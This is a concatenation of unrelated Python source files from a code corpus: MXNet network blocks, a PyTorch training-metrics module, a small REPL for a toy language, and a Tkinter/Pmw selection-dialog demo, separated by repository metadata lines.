        act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
        if not dcn:
            conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1),
                         pad=(dilation,dilation), dilate=(dilation,dilation),
                         no_bias=True, workspace=workspace, name=name + '_conv1')
        else:
            conv1_offset = mx.symbol.Convolution(name=name+'_conv1_offset', data=act1,
                num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
            conv1 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv1', data=act1, offset=conv1_offset,
                num_filter=int(num_filter*0.5), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
    else:
        act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
        conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
                                       no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
    bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
    if not binarize:
        act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
        if not dcn:
            conv2 = Conv(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1),
                         pad=(dilation,dilation), dilate=(dilation,dilation),
                         no_bias=True, workspace=workspace, name=name + '_conv2')
        else:
            conv2_offset = mx.symbol.Convolution(name=name+'_conv2_offset', data=act2,
                num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
            conv2 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv2', data=act2, offset=conv2_offset,
                num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
    else:
        act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
        conv2 = mx.sym.QConvolution_v1(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
                                       no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
    bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
    if not binarize:
        act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
        if not dcn:
            conv3 = Conv(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1),
                         pad=(dilation,dilation), dilate=(dilation,dilation),
                         no_bias=True, workspace=workspace, name=name + '_conv3')
        else:
            conv3_offset = mx.symbol.Convolution(name=name+'_conv3_offset', data=act3,
                num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
            conv3 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv3', data=act3, offset=conv3_offset,
                num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
    else:
        act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
        conv3 = mx.sym.QConvolution_v1(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
                                       no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
    # Concatenate the three branch outputs back to num_filter channels
    # (0.5 + 0.25 + 0.25).
    conv4 = mx.symbol.Concat(*[conv1, conv2, conv3])
    if binarize:
        conv4 = mx.sym.BatchNorm(data=conv4, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
    if dim_match:
        shortcut = data
    else:
        if not binarize:
            shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
                            workspace=workspace, name=name+'_sc')
        else:
            #assert(False)
            shortcut = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
                                              no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
            shortcut = mx.sym.BatchNorm(data=shortcut, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc_bn')
    if memonger:
        shortcut._set_attr(mirror_stage='True')
    return conv4 + shortcut
    #return bn4 + shortcut
    #return act4 + shortcut


def block17(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
    # Inception-style residual unit: a 1x1 branch plus a factorized
    # 1x7 / 7x1 branch, concatenated, projected back to the input channel
    # count and added to the input with a residual scale.
    # NOTE(review): 129 filters in tower_conv1_0 looks like a typo for 128
    # (would change the trained graph if "fixed") -- confirm intentional.
    tower_conv = ConvFactory(net, 192, (1, 1), name=name+'_conv')
    tower_conv1_0 = ConvFactory(net, 129, (1, 1), name=name+'_conv1_0')
    tower_conv1_1 = ConvFactory(tower_conv1_0, 160, (1, 7), pad=(1, 2), name=name+'_conv1_1')
    tower_conv1_2 = ConvFactory(tower_conv1_1, 192, (7, 1), pad=(2, 1), name=name+'_conv1_2')
    tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_2])
    tower_out = ConvFactory(
        tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
    net = net+scale * tower_out
    if with_act:
        act = mx.symbol.Activation(
            data=net, act_type=act_type, attr=mirror_attr)
        return act
    else:
        return net


def block35(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
    # Inception-style residual unit with three towers whose widths are
    # fractions of the input channel count (scaled by M), concatenated and
    # projected back before the scaled residual add.
    M = 1.0
    tower_conv = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv')
    tower_conv1_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv1_0')
    tower_conv1_1 = ConvFactory(tower_conv1_0, int(input_num_channels*0.25*M), (3, 3), pad=(1, 1), name=name+'_conv1_1')
    tower_conv2_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv2_0')
    tower_conv2_1 = ConvFactory(tower_conv2_0, int(input_num_channels*0.375*M), (3, 3), pad=(1, 1), name=name+'_conv2_1')
    tower_conv2_2 = ConvFactory(tower_conv2_1, int(input_num_channels*0.5*M), (3, 3), pad=(1, 1), name=name+'_conv2_2')
    tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_1, tower_conv2_2])
    tower_out = ConvFactory(
        tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
    net = net+scale * tower_out
    if with_act:
        act = mx.symbol.Activation(
            data=net, act_type=act_type, attr=mirror_attr)
        return act
    else:
        return net


def conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
    # Downsampling / channel-changing positions fall back to the resnet
    # unit; shape-preserving positions use an inception block35.
    assert not binarize
    if stride[0]>1 or not dim_match:
        return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
    conv4 = block35(data, num_filter, name=name+'_block35')
    return conv4


def conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
    # Downsampling / channel-changing positions fall back to the HPM unit;
    # shape-preserving positions use a CAB aggregation block with n=4.
    workspace = config.workspace
    if stride[0]>1 or not dim_match:
        return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
    cab = CAB(data, num_filter, 1, 4, workspace, name, dilate, 1)
    return cab.get()


def conv_block(data, num_filter, stride, dim_match, name, binarize, dcn, dilate):
    # Dispatch to the unit type selected by config.net_block; returns None
    # for an unknown value (no else branch).
    if config.net_block=='resnet':
        return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
    elif config.net_block=='inception':
        return conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
    elif config.net_block=='hpm':
        return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
    elif config.net_block=='cab':
        return conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)


# Dead code kept for reference: an earlier 1x1/deformable "lin" helper.
#def lin(data, num_filter, workspace, name, binarize, dcn):
#  bit = 1
#  ACT_BIT = config.ACT_BIT
#  bn_mom = config.bn_mom
#  workspace = config.workspace
#  if not binarize:
#    if not dcn:
#      conv1 = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
#                                no_bias=True, workspace=workspace, name=name + '_conv')
#      bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
#      act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
#      return act1
#    else:
#      bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
#      act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
#      conv1_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = act1,
#                                            num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
#      conv1 = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=act1, offset=conv1_offset,
#              num_filter=num_filter, pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=False)
#      #conv1 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
#      #                          no_bias=False, workspace=workspace, name=name + '_conv')
#      return conv1
#  else:
#    bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
#    act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
#    conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
#        no_bias=True, workspace=workspace, name=name + '_conv', act_bit=ACT_BIT, weight_bit=bit)
#    conv1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
#    return conv1


def lin3(data, num_filter, workspace, name, k, g=1, d=1):
    # Conv(kxk, groups=g, dilation=d) -> BN -> ReLU helper used by CAB.
    # For k==3 the padding equals the dilation, preserving spatial size.
    # NOTE(review): the ``workspace`` parameter is immediately shadowed by
    # config.workspace -- confirm that is intentional.
    bn_mom = config.bn_mom
    workspace = config.workspace
    if k!=3:
        conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=((k-1)//2,(k-1)//2), num_group=g,
                     no_bias=True, workspace=workspace, name=name + '_conv')
    else:
        conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=(d,d), num_group=g, dilate=(d, d),
                     no_bias=True, workspace=workspace, name=name + '_conv')
    bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
    act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
    ret = act1
    return ret


class CAB:
    """Builds a triangular grid of lin3 sub-graphs indexed by (w, h) with
    the raw input at (n, n); results are memoized in sym_map so shared
    sub-graphs are constructed only once.  get() returns the symbol at
    position (1, 1)."""

    def __init__(self, data, nFilters, nModules, n, workspace, name, dilate, group):
        self.data = data            # input symbol
        self.nFilters = nFilters    # channel count of the input symbol
        self.nModules = nModules    # NOTE(review): stored but never read here
        self.n = n                  # grid depth
        self.workspace = workspace
        self.name = name
        self.dilate = dilate
        self.group = group
        self.sym_map = {}           # (w, h) -> (symbol, num_channels) cache

    def get_output(self, w, h):
        # Recursively build (symbol, num_channels) for grid position (w, h).
        key = (w, h)
        if key in self.sym_map:
            return self.sym_map[key]
        ret = None
        if h==self.n:
            # Bottom row: successive channel-halving lin3 stages starting
            # from the raw input at (n, n); the last stage uses the
            # configured dilation.
            if w==self.n:
                ret = (self.data, self.nFilters)
            else:
                x = self.get_output(w+1, h)
                f = int(x[1]*0.5)
                if w!=self.n-1:
                    body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, 1)
                else:
                    body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, self.dilate)
                ret = (body,f)
        else:
            # Interior cell: average a transformed diagonal input (x) with a
            # channel-doubled copy of the cell below (y).
            x = self.get_output(w+1, h+1)
            y = self.get_output(w, h+1)
            if h%2==1 and h!=w:
                # NOTE(review): num_group is passed as x[1] here (elsewhere
                # it is self.group) -- depth-wise grouping; confirm intended.
                xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
                #xbody = xbody+x[0]
            else:
                xbody = x[0]
            #xbody = x[0]
            #xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
            if w==0:
                ybody = lin3(y[0], y[1], self.workspace, "%s_w%d_h%d_3"%(self.name, w, h), 3, self.group)
            else:
                ybody = y[0]
            ybody = mx.sym.concat(y[0], ybody, dim=1)
            body = mx.sym.add_n(xbody,ybody, name="%s_w%d_h%d_add"%(self.name, w, h))
            body = body/2
            ret = (body, x[1])
        self.sym_map[key] = ret
        return ret

    def get(self):
        # Final aggregated symbol of the whole block.
        return self.get_output(1, 1)[0]
2.171875
2
train/metric.py
alexandrosstergiou/Squeeze-and-Recursion-Temporal-Gates
54
16797
''' --- I M P O R T  S T A T E M E N T S --- '''
import logging

# `coloredlogs` only prettifies log output; degrade gracefully when the
# optional dependency is missing instead of crashing at import time.
try:
    import coloredlogs
    coloredlogs.install()
except ImportError:
    logging.basicConfig()

import numpy as np

'''
===  S T A R T  O F  C L A S S  E V A L M E T R I C ===

    [About]
        Base object class for metrics that accumulate a running average.

    [Init Args]
        - name: String for the variable name to calculate average value for.

    [Methods]
        - __init__ : Class initialiser
        - update : Function to be implemented by the children sub-classes.
        - reset : Function for resetting the number of instances and the sum of the metric.
        - get : Calculation of the average value based on the number of instances and the provided sum.
        - get_name_value : Function for returning the name(s) and the value(s).
        - check_label_shapes : Function responsible for type and shape checking.
'''
class EvalMetric(object):

    def __init__(self, name, **kwargs):
        # Metric name is coerced to string so `get()` always returns (str, value).
        self.name = str(name)
        self.reset()

    def update(self, preds, labels, losses, lr, batch_size):
        # Children define how a batch folds into (sum_metric, num_inst).
        raise NotImplementedError('Must be implemented in child classes!')

    def reset(self):
        """Clear the accumulated sum and the instance counter."""
        self.num_inst = 0
        self.sum_metric = 0.0

    def get(self):
        """Return ``(name, average value)``.

        Returns NaN when nothing has been accumulated, the raw sum when a
        single instance was seen, and the mean otherwise.
        """
        # case that instances are 0 -> return NaN
        if self.num_inst == 0:
            return (self.name, float('nan'))
        # case that instances are 1 -> return their sum
        if self.num_inst == 1:
            return (self.name, self.sum_metric)
        # case that instances are >1 -> return average
        return (self.name, self.sum_metric / self.num_inst)

    def get_name_value(self):
        """Return the metric as a list of ``(name, value)`` pairs."""
        name, value = self.get()
        if not isinstance(name, list):
            name = [name]
        if not isinstance(value, list):
            value = [value]
        return list(zip(name, value))

    def check_label_shapes(self, preds, labels):
        """Raise if predictions and labels disagree in (batch) size."""
        # Lists are compared by length; tensors/arrays by their first dim.
        if isinstance(labels, list) and isinstance(preds, list):
            label_shape, pred_shape = len(labels), len(preds)
        else:
            label_shape, pred_shape = labels.shape[0], preds.shape[0]

        if label_shape != pred_shape:
            # Exception type kept as NotImplementedError for backward
            # compatibility with existing callers, but now with a useful
            # message instead of the previous empty string.
            raise NotImplementedError(
                "Shape mismatch: {} predictions vs {} labels".format(
                    pred_shape, label_shape))
'''
===  E N D  O F  C L A S S  E V A L M E T R I C ===
'''


'''
===  S T A R T  O F  C L A S S  M E T R I C L I S T ===

    [About]
        EvalMetric class for creating a list containing EvalMetric objects.

    [Init Args]
        - name: String for the variable name.

    [Methods]
        - __init__ : Class initialiser
        - update : Function to update the list of EvalMetric objects.
        - reset : Function for resetting the list.
        - get : Function for getting each of the EvalMetric objects in the list.
        - get_name_value : Function for getting the name of the list items.
'''
class MetricList(EvalMetric):

    def __init__(self, *args, name="metric_list"):
        assert all([issubclass(type(x), EvalMetric) for x in args]), \
            "MetricList input is illegal: {}".format(args)
        self.metrics = [metric for metric in args]
        super(MetricList, self).__init__(name=name)

    def update(self, preds, labels, losses=None, lr=None, batch_size=None):
        # Normalise every argument to a list so child metrics can rely on it.
        preds = [preds] if type(preds) is not list else preds
        labels = [labels] if type(labels) is not list else labels
        losses = [losses] if type(losses) is not list else losses
        lr = [lr] if type(lr) is not list else lr
        batch_size = [batch_size] if type(batch_size) is not list else batch_size

        for metric in self.metrics:
            metric.update(preds, labels, losses, lr, batch_size)

    def reset(self):
        # `reset()` is called from the base initialiser before `self.metrics`
        # exists, hence the hasattr guard.
        if hasattr(self, 'metrics'):
            for metric in self.metrics:
                metric.reset()
        else:
            logging.warning("No metric defined.")

    def get(self):
        """Return a list with one ``(name, value)`` tuple per child metric."""
        outputs = []
        for metric in self.metrics:
            outputs.append(metric.get())
        return outputs

    def get_name_value(self):
        """Return a list with one ``[(name, value)]`` list per child metric."""
        outputs = []
        for metric in self.metrics:
            outputs.append(metric.get_name_value())
        return outputs
'''
===  E N D  O F  C L A S S  M E T R I C L I S T ===
'''


'''
===  S T A R T  O F  C L A S S  A C C U R A C Y ===

    [About]
        EvalMetric class for creating an accuracy estimate.

    [Init Args]
        - name: String for the variable name. Defaults to `accuracy`.
        - topk: Number of top predictions to be used of the score
          (top-1, top-5 etc.). Defaults to 1.

    [Methods]
        - __init__ : Class initialiser
        - update : Function to update scores.
'''
class Accuracy(EvalMetric):

    def __init__(self, name='accuracy', topk=1):
        super(Accuracy, self).__init__(name)
        self.topk = topk

    def update(self, preds, labels, losses, lr, batch_size):
        # `losses`, `lr` and `batch_size` are accepted for interface
        # uniformity with other metrics but not used here.
        preds = [preds] if type(preds) is not list else preds
        labels = [labels] if type(labels) is not list else labels

        self.check_label_shapes(preds, labels)
        for pred, label in zip(preds, labels):
            assert self.topk <= pred.shape[1], \
                "topk({}) should no larger than the pred dim({})".format(
                    self.topk, pred.shape[1])
            # pred_topk: (topk, batch) indices of the k largest scores.
            _, pred_topk = pred.topk(self.topk, 1, True, True)
            pred_topk = pred_topk.t()

            # A sample counts as correct if the label appears anywhere in
            # its top-k predictions.
            correct = pred_topk.eq(label.view(1, -1).expand_as(pred_topk))
            # assumes CPU tensors — `.numpy()` would fail on CUDA tensors;
            # TODO confirm callers always pass CPU data.
            self.sum_metric += float(
                correct.reshape(-1).float().sum(0, keepdim=True).numpy())
            self.num_inst += label.shape[0]
'''
===  E N D  O F  C L A S S  A C C U R A C Y ===
'''


'''
===  S T A R T  O F  C L A S S  L O S S ===

    [About]
        EvalMetric class for creating a loss score. The class acts as a
        `dummy estimate` as no further calculations are required for the
        loss. Instead it is primarily used to easily/directly print the loss.

    [Init Args]
        - name: String for the variable name. Defaults to `loss`.

    [Methods]
        - __init__ : Class initialiser
        - update : Function to update scores.
'''
class Loss(EvalMetric):

    def __init__(self, name='loss'):
        super(Loss, self).__init__(name)

    def update(self, preds, labels, losses, lr, batch_size):
        assert losses is not None, "Loss undefined."
        # Accumulate the element-wise sum; one instance per loss tensor.
        for loss in losses:
            self.sum_metric += float(loss.numpy().sum())
            self.num_inst += 1
'''
===  E N D  O F  C L A S S  L O S S ===
'''


'''
===  S T A R T  O F  C L A S S  B A T C H S I Z E ===

    [About]
        EvalMetric class for the batch size used. The class acts as a
        `dummy estimate` as no further calculations are required for the
        size of the batch. Instead it is primarily used to easily/directly
        print the batch size.

    [Init Args]
        - name: String for the variable name. Defaults to `batch-size`.

    [Methods]
        - __init__ : Class initialiser
        - update : Function used for updates.
'''
class BatchSize(EvalMetric):

    def __init__(self, name='batch-size'):
        super(BatchSize, self).__init__(name)

    def update(self, preds, labels, losses, lrs, batch_sizes):
        assert batch_sizes is not None, "Batch size undefined."
        # Stored verbatim (not accumulated): `get()` reports the last value.
        self.sum_metric = batch_sizes
        self.num_inst = 1
'''
===  E N D  O F  C L A S S  B A T C H S I Z E ===
'''


'''
===  S T A R T  O F  C L A S S  L E A R N I N G  R A T E ===

    [About]
        EvalMetric class for the learning rate used. The class acts as a
        `dummy estimate` as no further calculations are required for the
        size of the lr. Instead it is primarily used to easily/directly
        print the learning rate.

    [Init Args]
        - name: String for the variable name. Defaults to `lr`.

    [Methods]
        - __init__ : Class initialiser
        - update : Function used for updates.
'''
class LearningRate(EvalMetric):

    def __init__(self, name='lr'):
        super(LearningRate, self).__init__(name)

    def update(self, preds, labels, losses, lrs, batch_sizes):
        assert lrs is not None, "Learning rate undefined."
        # Stored verbatim (not accumulated): `get()` reports the last value.
        self.sum_metric = lrs[-1]
        self.num_inst = 1
'''
===  E N D  O F  C L A S S  L E A R N I N G  R A T E ===
'''


if __name__ == "__main__":
    import torch

    # Test Accuracy
    predicts = [torch.from_numpy(np.array([[0.7, 0.3], [0, 1.], [0.4, 0.6]]))]
    labels = [torch.from_numpy(np.array([0, 1, 1]))]
    losses = [torch.from_numpy(np.array([0.3, 0.4, 0.5]))]

    logging.getLogger().setLevel(logging.DEBUG)
    logging.debug("input pred: {}".format(predicts))
    logging.debug("input label: {}".format(labels))
    # fixed: previously logged `labels` under the "input loss" caption
    logging.debug("input loss: {}".format(losses))

    acc = Accuracy()
    acc.update(preds=predicts, labels=labels, losses=losses, lr=0, batch_size=1)
    logging.info(acc.get())

    # Test MetricList
    metrics = MetricList(Loss(name="ce-loss"),
                         Accuracy(topk=1, name="acc-top1"),
                         Accuracy(topk=2, name="acc-top2"),
                         )
    metrics.update(preds=predicts, labels=labels, losses=losses, lr=0, batch_size=1)

    logging.info("------------")
    logging.info(metrics.get())
    acc.get_name_value()
2.90625
3
poly/repl.py
jdanford/poly
0
16798
import sys
from string import whitespace

from clint.textui import puts, indent, colored

from poly.common import *
from poly.node import *


def repl_main(args):
    """Entry point: create a REPL backed by a node named "repl" and run it."""
    repl = Repl("repl")
    repl.run()


class UndefinedCommandError(PolyError):
    """Raised when the user enters a ``:command`` that is not recognized."""

    def __init__(self, command):
        self.message = "Undefined command '{}'".format(command)


class Repl:
    """Interactive read-eval-print loop for Poly.

    Lines starting with ``:`` are REPL commands (``:q``/``:quit`` exits);
    everything else is read and evaluated as a Poly expression.
    """

    def __init__(self, name, in_prompt=None, out_prompt=None):
        self.node = Node(name)

        if in_prompt is None:
            in_prompt = ">> "
        self.in_prompt = in_prompt

        if out_prompt is None:
            # Align output under the input prompt by default.
            out_prompt = "\n" + " " * len(in_prompt)
        self.out_prompt = out_prompt

        # Best-effort prelude load: report the error but keep the REPL usable.
        try:
            self.node.load_module("prelude.poly", "")
        except ModuleError as e:
            self.print_error(e)

    def run(self):
        """Run the main loop until the user quits."""
        self.print_banner("Poly 0.0")
        while True:
            s, is_command = self.get_input()
            if is_command:
                try:
                    should_exit = self.handle_command(s)
                except UndefinedCommandError as e:
                    self.print_error(e)
                    should_exit = False
                if should_exit:
                    break
                else:
                    continue

            try:
                expr = self.node.read(s)
                self.eval_and_print(expr)
            except PolyError as e:
                self.print_error(e)

    def eval_and_print(self, expr0):
        """Evaluate ``expr0``, print the result, and bind it to ``$``."""
        expr1 = self.node.eval(expr0)
        self.print_result(expr1)
        # `$` always holds the most recent result.
        self.node.env.table["$"] = expr1

    def handle_command(self, cmd):
        """Execute a REPL command; return True if the REPL should exit."""
        if cmd in ["q", "quit"]:
            return True
        elif cmd and cmd[0] == " ":
            # `: text` echoes `text` as a warning.
            self.print_warning(cmd[1:])
        else:
            # Covers both unknown commands and a bare ":" (empty command),
            # which previously crashed with an IndexError on cmd[0].
            raise UndefinedCommandError(cmd)
        return False

    def get_input(self):
        """Prompt until a non-blank line arrives.

        Returns ``(text, is_command)``; EOF/interrupt is mapped to the
        "quit" command.
        """
        while True:
            try:
                prompt = self.in_prompt
                puts(prompt, newline=False)
                s = input().strip()
                if empty_space(s):
                    continue
                elif s[0] == ":":
                    return s[1:], True
                else:
                    return s, False
            except (EOFError, KeyboardInterrupt):
                puts()
                return "quit", True

    def print_banner(self, s, width=72):
        line = "-" * width
        puts(line)
        puts(s)
        puts(line + "\n")

    def print_result(self, expr):
        prompt = colored.blue(self.out_prompt)
        puts(prompt + str(expr) + "\n")

    def print_str(self, s):
        puts(s)

    def print_warning(self, s):
        sign = colored.yellow("Warning: ")
        puts(sign + s + "\n")

    def print_error(self, e):
        sign = colored.red("Error: ")
        puts(sign + e.message + "\n")


def empty_space(s):
    """Return True if ``s`` is empty or consists only of whitespace.

    Fixed: the original loop tested ``s in whitespace`` (substring check on
    the whole string) instead of examining each character, so the
    per-character check never behaved as intended.
    """
    return all(c in whitespace for c in s)


if __name__ == "__main__":
    repl_main(sys.argv[1:])
2.8125
3
resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/Pmw/Pmw_1_3/demos/SelectionDialog.py
J-E-J-S/aaRS-Pipeline
3
16799
title = 'Pmw.SelectionDialog demonstration' # Import Pmw from this directory tree. import sys sys.path[:0] = ['../../..'] import Tkinter import Pmw class Demo: def __init__(self, parent): # Create the dialog. self.dialog = Pmw.SelectionDialog(parent, title = 'My SelectionDialog', buttons = ('OK', 'Cancel'), defaultbutton = 'OK', scrolledlist_labelpos = 'n', label_text = 'What do you think of Pmw?', scrolledlist_items = ('Cool man', 'Cool', 'Good', 'Bad', 'Gross'), command = self.execute) self.dialog.withdraw() # Create button to launch the dialog. w = Tkinter.Button(parent, text = 'Show selection dialog', command = self.dialog.activate) w.pack(padx = 8, pady = 8) def execute(self, result): sels = self.dialog.getcurselection() if len(sels) == 0: print 'You clicked on', result, '(no selection)' else: print 'You clicked on', result, sels[0] self.dialog.deactivate(result) ###################################################################### # Create demo in root window for testing. if __name__ == '__main__': root = Tkinter.Tk() Pmw.initialise(root) root.title(title) exitButton = Tkinter.Button(root, text = 'Exit', command = root.destroy) exitButton.pack(side = 'bottom') widget = Demo(root) root.mainloop()
2.828125
3